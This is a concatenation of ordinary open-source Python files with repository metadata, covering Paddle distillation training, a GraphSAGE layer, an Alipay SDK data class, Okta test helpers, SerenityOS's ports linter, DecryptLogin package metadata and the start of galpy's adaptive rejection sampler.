with paddle.utils.unique_name.guard():
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
predict = teacher_model.net(image, class_dim=class_dim)
exe.run(t_startup)
if not os.path.exists(args.teacher_pretrained_model):
_download(
'http://paddle-imagenet-models-name.bj.bcebos.com/ResNet50_vd_pretrained.tar',
'.')
_decompress('./ResNet50_vd_pretrained.tar')
assert args.teacher_pretrained_model and os.path.exists(
args.teacher_pretrained_model
), "teacher_pretrained_model should be set when teacher_model is not None."
def if_exist(var):
exist = os.path.exists(
os.path.join(args.teacher_pretrained_model, var.name))
if args.data == "cifar10" and (var.name == 'fc_0.w_0' or
var.name == 'fc_0.b_0'):
exist = False
return exist
paddle.static.load(teacher_program, args.teacher_pretrained_model, exe)
data_name_map = {'image': 'image'}
merge(teacher_program, student_program, data_name_map, place)
build_strategy = paddle.static.BuildStrategy()
dist_strategy = DistributedStrategy()
dist_strategy.build_strategy = build_strategy
with paddle.static.program_guard(student_program, s_startup):
distill_loss = soft_label("teacher_fc_0.tmp_0", "fc_0.tmp_0",
student_program)
loss = avg_cost + distill_loss
lr, opt = create_optimizer(args)
opt = fleet.distributed_optimizer(opt, strategy=dist_strategy)
opt.minimize(loss)
exe.run(s_startup)
parallel_main = student_program
for epoch_id in range(args.num_epochs):
for step_id, data in enumerate(train_loader):
loss_1, loss_2, loss_3 = exe.run(
parallel_main,
feed=data,
fetch_list=[loss.name, avg_cost.name, distill_loss.name])
if step_id % args.log_period == 0:
_logger.info(
"train_epoch {} step {} lr {:.6f}, loss {:.6f}, class loss {:.6f}, distill loss {:.6f}".
format(epoch_id, step_id,
lr.get_lr(), loss_1, loss_2, loss_3))
lr.step()
val_acc1s = []
val_acc5s = []
for step_id, data in enumerate(valid_loader):
val_loss, val_acc1, val_acc5 = exe.run(
val_program,
data,
fetch_list=[avg_cost.name, acc_top1.name, acc_top5.name])
val_acc1s.append(val_acc1)
val_acc5s.append(val_acc5)
if step_id % args.log_period == 0:
_logger.info(
"valid_epoch {} step {} loss {:.6f}, top1 {:.6f}, top5 {:.6f}".
format(epoch_id, step_id, val_loss, val_acc1, val_acc5))
if args.save_inference:
paddle.static.save_inference_model(
os.path.join("./saved_models", str(epoch_id)), [image], [out],
exe,
program=student_program)
_logger.info("epoch {} top1 {:.6f}, top5 {:.6f}".format(
epoch_id, np.mean(val_acc1s), np.mean(val_acc5s)))
def main():
args = parser.parse_args()
print_arguments(args)
compress(args)
if __name__ == '__main__':
paddle.enable_static()
main()
|
978a709276b4af960bbed737b4ec7fe346df9992
|
eb6be0dc3dd0c79483d55fcde59cff95f4f86acd
|
/graphgym/contrib/layer/sageinitconv.py
|
1f08149c49f0974dae73e7f4f05e55f574407fbc
|
[
"MIT"
] |
permissive
|
snap-stanford/GraphGym
|
67e96085f53f50a9d9e4e231a8a4ab12f42e287c
|
daded21169ec92fde8b1252b439a8fac35b07d79
|
refs/heads/master
| 2023-08-17T01:10:15.725520
| 2023-03-14T23:02:49
| 2023-03-14T23:02:49
| 303,907,761
| 1,451
| 188
|
NOASSERTION
| 2023-07-26T02:43:43
| 2020-10-14T05:01:35
|
Python
|
UTF-8
|
Python
| false
| false
| 4,353
|
py
|
sageinitconv.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from torch_geometric.nn.conv import MessagePassing
from torch_geometric.nn.inits import glorot, zeros
from torch_geometric.utils import add_remaining_self_loops
from graphgym.register import register_layer
class SAGEConvLayer(MessagePassing):
r"""The GraphSAGE operator from the `"Inductive Representation Learning on
Large Graphs" <https://arxiv.org/abs/1706.02216>`_ paper
.. math::
\mathbf{\hat{x}}_i &= \mathbf{\Theta} \cdot
\mathrm{mean}_{j \in \mathcal{N(i) \cup \{ i \}}}(\mathbf{x}_j)
\mathbf{x}^{\prime}_i &= \frac{\mathbf{\hat{x}}_i}
{\| \mathbf{\hat{x}}_i \|_2}.
Args:
in_channels (int): Size of each input sample.
out_channels (int): Size of each output sample.
normalize (bool, optional): If set to :obj:`True`, output features
will be :math:`\ell_2`-normalized. (default: :obj:`False`)
concat (bool, optional): If set to :obj:`True`, will concatenate
current node features with aggregated ones. (default: :obj:`False`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
"""
def __init__(self, in_channels, out_channels, normalize=False,
concat=False, bias=True, **kwargs):
super(SAGEConvLayer, self).__init__(aggr='mean', **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.normalize = normalize
self.concat = concat
in_channels = 2 * in_channels if concat else in_channels
self.weight = Parameter(torch.Tensor(in_channels, out_channels))
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
# original initialization
# uniform(self.weight.size(0), self.weight)
# uniform(self.weight.size(0), self.bias)
# change to new initialization
glorot(self.weight)
zeros(self.bias)
def forward(self, x, edge_index, edge_weight=None, size=None,
res_n_id=None):
"""
Args:
res_n_id (Tensor, optional): Residual node indices coming from
:obj:`DataFlow` generated by :obj:`NeighborSampler` are used to
select central node features in :obj:`x`.
Required if operating in a bipartite graph and :obj:`concat` is
:obj:`True`. (default: :obj:`None`)
"""
if not self.concat and torch.is_tensor(x):
edge_index, edge_weight = add_remaining_self_loops(
edge_index, edge_weight, 1, x.size(self.node_dim))
return self.propagate(edge_index, size=size, x=x,
edge_weight=edge_weight, res_n_id=res_n_id)
def message(self, x_j, edge_weight):
return x_j if edge_weight is None else edge_weight.view(-1, 1) * x_j
def update(self, aggr_out, x, res_n_id):
if self.concat and torch.is_tensor(x):
aggr_out = torch.cat([x, aggr_out], dim=-1)
elif self.concat and (isinstance(x, tuple) or isinstance(x, list)):
assert res_n_id is not None
aggr_out = torch.cat([x[0][res_n_id], aggr_out], dim=-1)
aggr_out = torch.matmul(aggr_out, self.weight)
if self.bias is not None:
aggr_out = aggr_out + self.bias
if self.normalize:
aggr_out = F.normalize(aggr_out, p=2, dim=-1)
return aggr_out
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class SAGEinitConv(nn.Module):
def __init__(self, dim_in, dim_out, bias=False, **kwargs):
super(SAGEinitConv, self).__init__()
self.model = SAGEConvLayer(dim_in, dim_out, bias=bias, concat=True)
def forward(self, batch):
batch.node_feature = self.model(batch.node_feature, batch.edge_index)
return batch
register_layer('sageinitconv', SAGEinitConv)
|
eae3fcf35ec95c84b3b4101b4362d48c751450eb
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AbnTaskInfo.py
|
95a0956a7c79d61c05ff4428d204dac2838ac658
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 7,182
|
py
|
AbnTaskInfo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TaskOperationLog import TaskOperationLog
class AbnTaskInfo(object):
def __init__(self):
self._extens_info = None
self._gmt_create = None
self._gmt_modified = None
self._handler_id = None
self._handler_nick = None
self._task_desc = None
self._task_id = None
self._task_level = None
self._task_name = None
self._task_operation_logs = None
self._task_status = None
self._task_type = None
@property
def extens_info(self):
return self._extens_info
@extens_info.setter
def extens_info(self, value):
self._extens_info = value
@property
def gmt_create(self):
return self._gmt_create
@gmt_create.setter
def gmt_create(self, value):
self._gmt_create = value
@property
def gmt_modified(self):
return self._gmt_modified
@gmt_modified.setter
def gmt_modified(self, value):
self._gmt_modified = value
@property
def handler_id(self):
return self._handler_id
@handler_id.setter
def handler_id(self, value):
self._handler_id = value
@property
def handler_nick(self):
return self._handler_nick
@handler_nick.setter
def handler_nick(self, value):
self._handler_nick = value
@property
def task_desc(self):
return self._task_desc
@task_desc.setter
def task_desc(self, value):
self._task_desc = value
@property
def task_id(self):
return self._task_id
@task_id.setter
def task_id(self, value):
self._task_id = value
@property
def task_level(self):
return self._task_level
@task_level.setter
def task_level(self, value):
self._task_level = value
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, value):
self._task_name = value
@property
def task_operation_logs(self):
return self._task_operation_logs
@task_operation_logs.setter
def task_operation_logs(self, value):
if isinstance(value, list):
self._task_operation_logs = list()
for i in value:
if isinstance(i, TaskOperationLog):
self._task_operation_logs.append(i)
else:
self._task_operation_logs.append(TaskOperationLog.from_alipay_dict(i))
@property
def task_status(self):
return self._task_status
@task_status.setter
def task_status(self, value):
self._task_status = value
@property
def task_type(self):
return self._task_type
@task_type.setter
def task_type(self, value):
self._task_type = value
def to_alipay_dict(self):
params = dict()
if self.extens_info:
if hasattr(self.extens_info, 'to_alipay_dict'):
params['extens_info'] = self.extens_info.to_alipay_dict()
else:
params['extens_info'] = self.extens_info
if self.gmt_create:
if hasattr(self.gmt_create, 'to_alipay_dict'):
params['gmt_create'] = self.gmt_create.to_alipay_dict()
else:
params['gmt_create'] = self.gmt_create
if self.gmt_modified:
if hasattr(self.gmt_modified, 'to_alipay_dict'):
params['gmt_modified'] = self.gmt_modified.to_alipay_dict()
else:
params['gmt_modified'] = self.gmt_modified
if self.handler_id:
if hasattr(self.handler_id, 'to_alipay_dict'):
params['handler_id'] = self.handler_id.to_alipay_dict()
else:
params['handler_id'] = self.handler_id
if self.handler_nick:
if hasattr(self.handler_nick, 'to_alipay_dict'):
params['handler_nick'] = self.handler_nick.to_alipay_dict()
else:
params['handler_nick'] = self.handler_nick
if self.task_desc:
if hasattr(self.task_desc, 'to_alipay_dict'):
params['task_desc'] = self.task_desc.to_alipay_dict()
else:
params['task_desc'] = self.task_desc
if self.task_id:
if hasattr(self.task_id, 'to_alipay_dict'):
params['task_id'] = self.task_id.to_alipay_dict()
else:
params['task_id'] = self.task_id
if self.task_level:
if hasattr(self.task_level, 'to_alipay_dict'):
params['task_level'] = self.task_level.to_alipay_dict()
else:
params['task_level'] = self.task_level
if self.task_name:
if hasattr(self.task_name, 'to_alipay_dict'):
params['task_name'] = self.task_name.to_alipay_dict()
else:
params['task_name'] = self.task_name
if self.task_operation_logs:
if isinstance(self.task_operation_logs, list):
for i in range(0, len(self.task_operation_logs)):
element = self.task_operation_logs[i]
if hasattr(element, 'to_alipay_dict'):
self.task_operation_logs[i] = element.to_alipay_dict()
if hasattr(self.task_operation_logs, 'to_alipay_dict'):
params['task_operation_logs'] = self.task_operation_logs.to_alipay_dict()
else:
params['task_operation_logs'] = self.task_operation_logs
if self.task_status:
if hasattr(self.task_status, 'to_alipay_dict'):
params['task_status'] = self.task_status.to_alipay_dict()
else:
params['task_status'] = self.task_status
if self.task_type:
if hasattr(self.task_type, 'to_alipay_dict'):
params['task_type'] = self.task_type.to_alipay_dict()
else:
params['task_type'] = self.task_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AbnTaskInfo()
if 'extens_info' in d:
o.extens_info = d['extens_info']
if 'gmt_create' in d:
o.gmt_create = d['gmt_create']
if 'gmt_modified' in d:
o.gmt_modified = d['gmt_modified']
if 'handler_id' in d:
o.handler_id = d['handler_id']
if 'handler_nick' in d:
o.handler_nick = d['handler_nick']
if 'task_desc' in d:
o.task_desc = d['task_desc']
if 'task_id' in d:
o.task_id = d['task_id']
if 'task_level' in d:
o.task_level = d['task_level']
if 'task_name' in d:
o.task_name = d['task_name']
if 'task_operation_logs' in d:
o.task_operation_logs = d['task_operation_logs']
if 'task_status' in d:
o.task_status = d['task_status']
if 'task_type' in d:
o.task_type = d['task_type']
return o
|
34c98707014e4a44b770efdbc560aaceaf7c458d
|
3e63608e1cad90bc845c4580723e57ae7ca3f61d
|
/tests/data/okta/utils.py
|
80068a08a10f245e8e84f7259146d96bd98990d5
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
lyft/cartography
|
06dcbf13907cbb9a31b75cd8b21f5721f7cc1b01
|
830b8944879a01f52b21ee12b6fddf245f9733cb
|
refs/heads/master
| 2023-08-31T12:27:59.752452
| 2023-08-28T20:42:12
| 2023-08-28T20:42:12
| 172,811,550
| 2,778
| 334
|
Apache-2.0
| 2023-09-13T04:59:46
| 2019-02-27T00:16:29
|
Python
|
UTF-8
|
Python
| false
| false
| 809
|
py
|
utils.py
|
import time
from requests import Response
def create_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '299'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 59)
return response
def create_throttled_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '3'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 3)
return response
def create_long_timeout_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '3'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 120)
return response
|
8080c41f86407c7f36dbb5937186f5a8508d897b
|
eda03521b87da8bdbef6339b5b252472a5be8d23
|
/Meta/lint-ports.py
|
4fb39e2eff7fac856219d473f82221328e62112e
|
[
"BSD-2-Clause"
] |
permissive
|
SerenityOS/serenity
|
6ba3ffb242ed76c9f335bd2c3b9a928329cd7d98
|
ef9b6c25fafcf4ef0b44a562ee07f6412aeb8561
|
refs/heads/master
| 2023-09-01T13:04:30.262106
| 2023-09-01T08:06:28
| 2023-09-01T10:45:38
| 160,083,795
| 27,256
| 3,929
|
BSD-2-Clause
| 2023-09-14T21:00:04
| 2018-12-02T19:28:41
|
C++
|
UTF-8
|
Python
| false
| false
| 14,113
|
py
|
lint-ports.py
|
#!/usr/bin/env python3
import os
import re
import stat
import sys
import subprocess
from pathlib import Path
from tempfile import NamedTemporaryFile
# Matches e.g. "| [`bash`](bash/) | GNU Bash | 5.0 | https://www.gnu.org/software/bash/ |"
# and captures "bash" in group 1, "bash/" in group 2, "<spaces>" in group 3, "GNU Bash" in group 4, "5.0" in group 5
# and "https://www.gnu.org/software/bash/" in group 6.
PORT_TABLE_REGEX = re.compile(
r'^\| \[`([^`]+)`\]\(([^\)]+)\)([^\|]+) \| ([^\|]+) \| ([^\|]+?) \| ([^\|]+) \|+$', re.MULTILINE
)
# Matches non-abbreviated git hashes
GIT_HASH_REGEX = re.compile(r'^[0-9a-f]{40}$')
PORT_TABLE_FILE = 'AvailablePorts.md'
IGNORE_FILES = {
'.gitignore',
'.port_include.sh',
'.strip_env.sh',
PORT_TABLE_FILE,
'build_all.sh',
'build_installed.sh',
'README.md',
'.hosted_defs.sh'
}
# Matches port names in Ports/foo/ReadMe.md
PORT_NAME_REGEX = re.compile(r'([ .()[\]{}\w-]+)\.patch')
REQUIRE_GIT_PATCHES = True
GIT_PATCH_SUBJECT_RE = re.compile(r'Subject: (.*)\n')
def read_port_table(filename):
"""Open a file and find all PORT_TABLE_REGEX matches.
Args:
filename (str): filename
Returns:
set: all PORT_TABLE_REGEX matches
"""
ports = {}
with open(filename, 'r') as fp:
matches = PORT_TABLE_REGEX.findall(fp.read())
for match in matches:
line_len = sum([len(part) for part in match])
ports[match[0]] = {
"dir_ref": match[1],
"name": match[2].strip(),
"version": match[4].strip(),
"url": match[5].strip(),
"line_len": line_len
}
return ports
def read_port_dirs():
"""Check Ports directory for unexpected files and check each port has an executable package.sh file.
Returns:
list: all ports (set), no errors encountered (bool)
"""
ports = {}
all_good = True
for entry in os.listdir():
if entry in IGNORE_FILES:
continue
if not os.path.isdir(entry):
print(f"Ports/{entry} is neither a port (not a directory) nor an ignored file?!")
all_good = False
continue
if os.listdir(entry) == []:
continue
if not os.path.exists(entry + '/package.sh'):
print(f"Ports/{entry}/ is missing its package.sh?!")
all_good = False
continue
if not os.stat(entry + '/package.sh')[stat.ST_MODE] & stat.S_IXUSR:
print(f"Ports/{entry}/package.sh is not executable?!")
all_good = False
ports[entry] = get_port_properties(entry)
return ports, all_good
PORT_PROPERTIES = ('port', 'version', 'files')
def resolve_script_values(value: str, props: dict) -> str:
"""Resolve all ${...} values in a string.
Args:
value (str): string to resolve
props (dict): dict of properties to resolve from
Returns:
str: resolved string
"""
for match in re.finditer(r'\$\{([^}]+)\}', value):
key = match.group(1)
if key in props:
value = value.replace(match.group(0), props[key])
return value
def get_script_props(dir: str, script_name: str, props: dict, depth: int = 0, max_depth: int = 10) -> dict:
"""Parse a script file and return a dict of properties.
Args:
dir (str): root directory of script
script_name (str): name of script to parse
props (dict): dict of properties to resolve from
depth (int): current depth of recursion
max_depth (int): maximum depth of recursion
Returns:
dict: dict of properties
"""
if depth > max_depth:
print(f"Maximum recursion depth exceeded while parsing {dir}/{script_name}")
return props
buffer: str = ""
for line in open(f"{dir}/{script_name}", 'r'):
# Ignore comments (search in reverse to ignore # in strings)
if line.rfind("#") > min(line.rfind('"'), line.rfind("'"), 0):
line = line[0:line.rfind("#")]
line = line.rstrip()
buffer += line
if "=" in buffer:
[key, value] = buffer.split("=", 1)
if (key.startswith(" ") or key.isspace()):
buffer = ""
continue
if (value.startswith(('"', "'"))):
if (value.endswith(value[0]) and len(value) > 1):
value = value[1:-1]
else:
buffer += "\n"
continue
props[key] = resolve_script_values(value, props)
buffer = ""
elif buffer.startswith('source'):
resolved_path = resolve_script_values(buffer, props).split(' ', 1)[1]
props = get_script_props(dir, resolved_path, props, depth + 1, max_depth)
buffer = ""
else:
buffer = ""
return props
def get_port_properties(port):
"""Retrieves common port properties from its package.sh file.
Returns:
dict: keys are values from PORT_PROPERTIES, values are from the package.sh file
"""
props = get_script_props(port, 'package.sh', {})
props = {prop: props[prop] if prop in props else '' for prop in PORT_PROPERTIES}
return props
def check_package_files(ports):
"""Check port package.sh file for required properties.
Args:
ports (list): List of all ports to check
Returns:
bool: no errors encountered
"""
all_good = True
for port in ports.keys():
package_file = f"{port}/package.sh"
if not os.path.exists(package_file):
continue
props = ports[port]
if props['port'] != port:
print(f"Ports/{port} should use '{port}' for 'port' but is using '{props['port']}' instead")
all_good = False
for prop in PORT_PROPERTIES:
if props[prop] == '':
print(f"Ports/{port} is missing required property '{prop}'")
all_good = False
return all_good
def get_and_check_port_patch_list(ports):
"""Checks all port patches and returns the port list/properties
Args:
ports (list): List of all ports to check
Returns:
all_good (bool): No errors encountered
all_properties (dict): Mapping of port to port properties
"""
all_port_properties = {}
all_good = True
for port in ports:
patches_directory = f"{port}/patches"
if not os.path.exists(patches_directory):
continue
if not os.path.isdir(patches_directory):
print(f"Ports/{port}/patches exists, but is not a directory. This is not right!")
all_good = False
continue
patches_path = Path(patches_directory)
patches_readme_path = patches_path / "ReadMe.md"
patch_files = set(patches_path.glob("*.patch"))
non_patch_files = set(patches_path.glob("*")) - patch_files - {patches_readme_path}
port_properties = {
"patches_path": patches_path,
"patches_readme_path": patches_readme_path,
"patch_files": patch_files,
"non_patch_files": non_patch_files
}
all_port_properties[port] = port_properties
if len(non_patch_files) != 0:
print(f"Ports/{port}/patches contains the following non-patch files:",
', '.join(x.name for x in non_patch_files))
all_good = False
return all_good, all_port_properties
def check_descriptions_for_port_patches(patches):
"""Ensure that ports containing patches have them documented.
Args:
patches (dict): Dictionary mapping ports to all their patches
Returns:
bool: no errors encountered
"""
all_good = True
for port, properties in patches.items():
patches_readme_path = properties["patches_readme_path"]
patch_files = properties["patch_files"]
readme_file_exists = patches_readme_path.exists()
if len(patch_files) == 0:
print(f"Ports/{port}/patches exists, but contains no patches", end="")
if readme_file_exists:
print(", yet it contains a ReadMe.md")
else:
print()
all_good = False
continue
if not readme_file_exists:
print(f"Ports/{port}/patches contains patches but no ReadMe.md describing them")
all_good = False
continue
with open(str(patches_readme_path), 'r', encoding='utf-8') as f:
readme_contents = []
for line in f:
if not line.startswith('#'):
continue
match = PORT_NAME_REGEX.search(line)
if match:
readme_contents.append(match.group(1))
patch_names = set(Path(x).stem for x in patch_files)
for patch_name in patch_names:
if patch_name not in readme_contents:
print(f"Ports/{port}/patches/{patch_name}.patch does not appear to be described in"
" the corresponding ReadMe.md")
all_good = False
for patch_name in readme_contents:
if patch_name not in patch_names:
print(f"Ports/{port}/patches/{patch_name}.patch is described in ReadMe.md, "
"but does not actually exist")
all_good = False
return all_good
def try_parse_git_patch(path_to_patch):
with open(path_to_patch, 'rb') as f:
contents_of_patch = f.read()
with NamedTemporaryFile('r+b') as message_file:
res = subprocess.run(
f"git mailinfo {message_file.name} /dev/null",
shell=True,
capture_output=True,
input=contents_of_patch)
if res.returncode != 0:
return None
message = message_file.read().decode('utf-8')
subject = GIT_PATCH_SUBJECT_RE.search(res.stdout.decode("utf-8"))
if subject:
message = subject.group(1) + "\n" + message
return message
def check_patches_are_git_patches(patches):
"""Ensure that all patches are patches made by (or compatible with) `git format-patch`.
Args:
patches (dict): Dictionary mapping ports to all their patches
Returns:
bool: no errors encountered
"""
all_good = True
for port, properties in patches.items():
for patch_path in properties["patch_files"]:
result = try_parse_git_patch(patch_path)
if not result:
print(f"Ports/{port}/patches: {patch_path.stem} does not appear to be a valid "
"git patch.")
all_good = False
continue
return all_good
def check_available_ports(from_table, ports):
"""Check AvailablePorts.md for correct properties.
Args:
from_table (dict): Ports table from AvailablePorts.md
ports (dict): Dictionary with port properties from package.sh
Returns:
bool: no errors encountered
"""
all_good = True
previous_line_len = None
for port in from_table.keys():
if previous_line_len is None:
previous_line_len = from_table[port]["line_len"]
if previous_line_len != from_table[port]["line_len"]:
print(f"Table row for port {port} is improperly aligned with other rows.")
all_good = False
else:
previous_line_len = from_table[port]["line_len"]
actual_ref = from_table[port]["dir_ref"]
expected_ref = f"{port}/"
if actual_ref != expected_ref:
print((
f'Directory link target in AvailablePorts.md for port {port} is '
f'incorrect, expected "{expected_ref}", found "{actual_ref}"'
))
all_good = False
actual_version = from_table[port]["version"]
expected_version = ports[port]["version"]
if GIT_HASH_REGEX.match(expected_version):
expected_version = expected_version[0:7]
if expected_version == "git":
expected_version = ""
if actual_version != expected_version:
print((
f'Version in AvailablePorts.md for port {port} is incorrect, '
f'expected "{expected_version}", found "{actual_version}"'
))
all_good = False
return all_good
def run():
"""Check Ports directory and package files for errors."""
from_table = read_port_table(PORT_TABLE_FILE)
ports, all_good = read_port_dirs()
from_table_set = set(from_table.keys())
ports_set = set(ports.keys())
if list(from_table.keys()) != sorted(from_table.keys(), key=str.lower):
all_good = False
print('AvailablePorts.md is not in the correct order, please ensure that all ports are sorted as follows:')
for port in sorted(from_table.keys(), key=str.lower):
print(f" {port}")
if from_table_set - ports_set:
all_good = False
print('AvailablePorts.md lists ports that do not appear in the file system:')
for port in sorted(from_table_set - ports_set):
print(f" {port}")
if ports_set - from_table_set:
all_good = False
print('AvailablePorts.md is missing the following ports:')
for port in sorted(ports_set - from_table_set):
print(f" {port}")
if not check_package_files(ports):
all_good = False
if not check_available_ports(from_table, ports):
all_good = False
patch_list_good, port_properties = get_and_check_port_patch_list(ports.keys())
all_good = all_good and patch_list_good
if not check_descriptions_for_port_patches(port_properties):
all_good = False
if REQUIRE_GIT_PATCHES and not check_patches_are_git_patches(port_properties):
all_good = False
if not all_good:
sys.exit(1)
print('No issues found.')
if __name__ == '__main__':
os.chdir(f"{os.path.dirname(__file__)}/../Ports")
run()
|
4db9a766c0d562201f6d132c93fa2561c0e2d3f4
|
6a7005ca7e418a18cbfeec296129873aef6446a4
|
/DecryptLogin/__init__.py
|
3966146cc6771ddc975e6982ab78c198aac28943
|
[
"Apache-2.0"
] |
permissive
|
CharlesPikachu/DecryptLogin
|
f0646d37e8604fb9c41dc74c17c0ea48cb5066ec
|
bb4228c0535ffd7060b7816cbd1da51ba8d95ab8
|
refs/heads/master
| 2023-05-22T15:21:59.038844
| 2022-08-29T08:59:05
| 2022-08-29T08:59:05
| 172,416,496
| 2,871
| 809
|
Apache-2.0
| 2022-10-06T14:58:49
| 2019-02-25T01:57:20
|
Python
|
UTF-8
|
Python
| false
| false
| 449
|
py
|
__init__.py
|
'''版本号'''
__version__ = '0.3.9'
'''作者'''
__author__ = 'Charles'
'''标题'''
__title__ = 'DecryptLogin'
'''描述'''
__description__ = 'DecryptLogin: APIs for loginning some websites by using requests.'
'''链接'''
__url__ = 'https://github.com/CharlesPikachu/DecryptLogin'
'''邮件'''
__email__ = 'charlesblwx@gmail.com'
'''license'''
__license__ = 'Apache License 2.0'
'''copyright'''
__copyright__ = 'Copyright 2021-2022 Zhenchao Jin'
|
198cceeb8347a4e278a82fb88fda9fb798d27292
|
3ab0ce5a37683744fca77c0ee7172eea7b839feb
|
/galpy/util/ars.py
|
58c9892ffe6bfdd72c5f45468dc5d4830cc21302
|
[
"BSD-3-Clause"
] |
permissive
|
jobovy/galpy
|
8ee6c00a2796e6bdb920625ce7c5cb32b47b5bc9
|
a46619fd4f5979acfccad23f4d57503033f440c5
|
refs/heads/main
| 2023-08-25T04:18:39.588870
| 2023-08-14T02:34:26
| 2023-08-14T02:34:26
| 2,375,854
| 182
| 119
|
BSD-3-Clause
| 2023-09-11T03:28:59
| 2011-09-13T03:20:30
|
Python
|
UTF-8
|
Python
| false
| false
| 15,787
|
py
|
ars.py
|
#############################################################################
# Copyright (c) 2011, Jo Bovy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
# WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#############################################################################
import numpy
import scipy.stats as stats
# TO DO:
# Throw errors in the sample_hull routine
def ars(domain, isDomainFinite, abcissae, hx, hpx, nsamples=1, hxparams=(), maxn=100):
"""ars: Implementation of the Adaptive-Rejection Sampling
algorithm by Gilks & Wild (1992): Adaptive Rejection Sampling
for Gibbs Sampling, Applied Statistics, 41, 337
Based on Wild & Gilks (1993), Algorithm AS 287: Adaptive Rejection
Sampling from Log-concave Density Functions, Applied Statistics, 42, 701
Input:
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
abcissae - initial list of abcissae (must lie on either side of the peak in hx if the domain is unbounded
hx - function that evaluates h(x) = ln g(x)
hpx - function that evaluates hp(x) = d h(x) / d x
nsamples - (optional) number of desired samples (default=1)
hxparams - (optional) a tuple of parameters for h(x) and h'(x)
maxn - (optional) maximum number of updates to the hull (default=100)
Output:
list with nsamples of samples from exp(h(x))
External dependencies:
math
scipy
scipy.stats
History:
2009-05-21 - Written - Bovy (NYU)
"""
# First set-up the upper and lower hulls
hull = setup_hull(domain, isDomainFinite, abcissae, hx, hpx, hxparams)
# Then start sampling: call sampleone repeatedly
out = []
nupdates = 0
for ii in range(int(nsamples)):
thissample, hull, nupdates = sampleone(
hull, hx, hpx, domain, isDomainFinite, maxn, nupdates, hxparams
)
out.append(thissample)
return out
def setup_hull(domain, isDomainFinite, abcissae, hx, hpx, hxparams):
"""setup_hull: set up the upper and lower hull and everything that
comes with that
Input:
domain - [.,.] upper and lower limit to the domain
isDomainFinite - [.,.] is there a lower/upper limit to the domain?
abcissae - initial list of abcissae (must lie on either side
of the peak in hx if the domain is unbounded
hx - function that evaluates h(x)
hpx - function that evaluates hp(x)
hxparams - tuple of parameters for h(x) and h'(x)
Output:
list with:
[0]= c_u
[1]= xs
[2]= h(xs)
[3]= hp(xs)
[4]= zs
[5]= s_cum
[6]= hu(zi)
History:
2009-05-21 - Written - Bovy (NYU)
"""
nx = len(abcissae)
# Create the output arrays
xs = numpy.zeros(nx)
hxs = numpy.zeros(nx)
hpxs = numpy.zeros(nx)
zs = numpy.zeros(nx - 1)
scum = numpy.zeros(nx - 1)
hus = numpy.zeros(nx - 1)
# Function evaluations
xs = numpy.sort(abcissae)
for ii in range(nx):
hxs[ii] = hx(xs[ii], hxparams)
hpxs[ii] = hpx(xs[ii], hxparams)
# THERE IS NO CHECKING HERE TO SEE WHETHER IN THE INFINITE DOMAIN CASE
# WE HAVE ABCISSAE ON BOTH SIDES OF THE PEAK
# zi
for jj in range(nx - 1):
zs[jj] = (
hxs[jj + 1] - hxs[jj] - xs[jj + 1] * hpxs[jj + 1] + xs[jj] * hpxs[jj]
) / (hpxs[jj] - hpxs[jj + 1])
# hu
for jj in range(nx - 1):
